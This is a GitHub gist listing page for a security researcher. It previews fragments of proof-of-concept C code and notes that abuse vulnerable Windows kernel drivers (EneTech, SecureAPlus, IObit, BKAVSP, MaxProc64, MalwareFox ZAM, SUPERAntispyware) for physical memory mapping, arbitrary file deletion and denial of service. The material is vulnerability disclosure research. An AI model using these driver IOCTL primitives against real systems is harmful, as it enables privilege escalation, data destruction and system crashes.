Skip to content

Instantly share code, notes, and snippets.

View hfiref0x's full-sized avatar

hfiref0x

3.9k followers · 19 following
View GitHub Profile
@hfiref0x
hfiref0x / enetech_new.c
Created August 12, 2020 12:26
EneTech newest variant (May 2020) unlock, (app+dll)
#include <windows.h>
#include <cstdio>
#include "ntos.h"
#define WINIO_DEVICE_TYPE (DWORD)0x8010
#define WINIO_MAP_FUNCID (DWORD)0x810
#define WINIO_UNMAP_FUNCID (DWORD)0x811
#define IOCTL_WINIO_MAP_USER_PHYSICAL_MEMORY \
@hfiref0x
hfiref0x / gist:720e2caf58a770117caa1d51d2745491
Created June 11, 2020 18:30
#pragma warning(disable: 4005)
#include <windows.h>
#include <cstdio>
#include <ntstatus.h>
typedef NTSTATUS (NTAPI *pfnNtCreateEnclave)(
_In_ HANDLE ProcessHandle,
_Inout_ PVOID* BaseAddress,
_In_ ULONG_PTR ZeroBits,
@hfiref0x
hfiref0x / SecureAPlus.c
Created February 28, 2020 05:45
SecureAPlus driver DoS
#pragma warning(disable: 4005)
#include <windows.h>
#include <strsafe.h>
#include <ntstatus.h>
#include "ntos.h"
NTSTATUS CallDriver(
_In_ HANDLE DeviceHandle,
_In_ ULONG IoControlCode,
@hfiref0x
hfiref0x / imf.c
Created February 26, 2020 16:33
IObit Malware Fighter ImfObCallback.sys features
#pragma warning(disable: 4005)
#include <windows.h>
#include <strsafe.h>
#include <ntstatus.h>
#include "ntos.h"
NTSTATUS CallDriver(
_In_ HANDLE DeviceHandle,
_In_ ULONG IoControlCode,
@hfiref0x
hfiref0x / zam.md
Created February 26, 2020 06:52
MalwareFox ZAM backdoor IOCTL list

ZAM64.SYS (ZAMGUARD64.SYS) most interesting IOCTLs.

All parameters to the functions supplied from user-mode via DeviceIoControl parameters. Everything from this available for any local user on machine where this driver is running.

0x8000202C

Arbitrary file deletion. Resets file attributes via ZwSetInformationFile and then does ZwDeleteFile.

0x80002030

Wrapper around ZwQuerySystemInformation(SystemProcessInformation).

@hfiref0x
hfiref0x / bkavsp.c
Created February 25, 2020 18:35
BKAVSP Arbitrary File Deletion
#pragma warning(disable: 4005)
#include <windows.h>
#include <strsafe.h>
#include <ntstatus.h>
#include "ntos.h"
#if defined (_MSC_VER)
#if (_MSC_VER >= 1900)
#ifdef _DEBUG
@hfiref0x
hfiref0x / desc.txt
Created February 25, 2020 08:07
SUPERAntispyware backdoor
This is saskutil64.sys 1.0.0.1016 driver of SUPERAntispyware 8.0.0.1050 (current), both Free/Pro editions.
The SaskCallDriver function work with fixed size buffer send from user mode.
This buffer is a structure defined as
#pragma pack(push, 1)
typedef struct _CALL_DRV {
WCHAR DeviceName[2048]; //e.g. \Device\Harddisk0\DR0
LARGE_INTEGER StartingOffset;
SIZE_T DataSize;
PVOID DataPtr; //pointer to user mode allocated buffer of DataSize length.
@hfiref0x
hfiref0x / MaxBSOD.c
Created February 24, 2020 06:50
int main()
{
HANDLE deviceHandle = CreateFile(TEXT("\\\\.\\MaxProc64"),
GENERIC_READ | GENERIC_WRITE,
0,
NULL,
OPEN_EXISTING,
0,
NULL);
@hfiref0x
hfiref0x / maxproc64.c
Created February 24, 2020 06:36
__int64 __fastcall DrvDispatch(PDEVICE_OBJECT DeviceObject, _IRP *Irp)
{
_IO_STACK_LOCATION *StackLocation;
_IRP *_Irp;
__int64 Id;
StackLocation = Irp->Tail.Overlay.CurrentStackLocation;
_Irp = Irp;
switch ( StackLocation->Parameters.DeviceIoControl.IoControlCode )
{
@hfiref0x
hfiref0x / 0.c
Created February 22, 2020 07:34
IOBit WinRing0 hack-o-rama
#include <windows.h>
#include "ntos.h"
#include <cstdio>
NTSTATUS CallDriver(
_In_ HANDLE DeviceHandle,
_In_ ULONG IoControlCode,
_In_ PVOID InputBuffer,
_In_ ULONG InputBufferLength,
_In_opt_ PVOID OutputBuffer,